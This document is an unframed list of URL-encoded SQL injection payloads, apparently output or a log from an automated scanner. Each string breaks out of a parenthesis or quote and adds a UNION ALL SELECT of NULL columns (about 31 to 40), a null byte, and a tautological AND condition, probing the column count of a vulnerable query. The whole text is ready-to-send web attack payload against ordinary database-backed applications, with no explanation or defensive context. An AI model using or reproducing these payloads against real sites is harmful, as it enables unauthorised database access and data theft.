1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%284032%3D4032 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%283816%3D3816 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%288573%3D8573 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%286237%3D6237 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%282993%3D2993 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%285297%3D5297 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%285447%3D5447 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%284396%3D4396 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%289581%3D9581 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%286239%3D6239 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%281447%3D1447 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%282294%3D2294 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%287512%3D7512 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%281477%3D1477 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%281717%3D1717 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%284063%3D4063 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%285044%3D5044 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%284409%3D4409 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%281055%3D1055 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%287661%3D7661 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%287455%3D7455 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%284600%3D4600 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%281272%3D1272 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%288885%3D8885 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%283517%3D3517 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%289801%3D9801 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%283514%3D3514 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%284663%3D4663 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27NPCB%27%3D%27NPCB 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27mbNC%27%3D%27mbNC 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27LopS%27%3D%27LopS 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27tEvS%27%3D%27tEvS 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27zkYy%27%3D%27zkYy 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27iXax%27%3D%27iXax 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27JSkw%27%3D%27JSkw 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27MXdd%27%3D%27MXdd 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27ElRz%27%3D%27ElRz 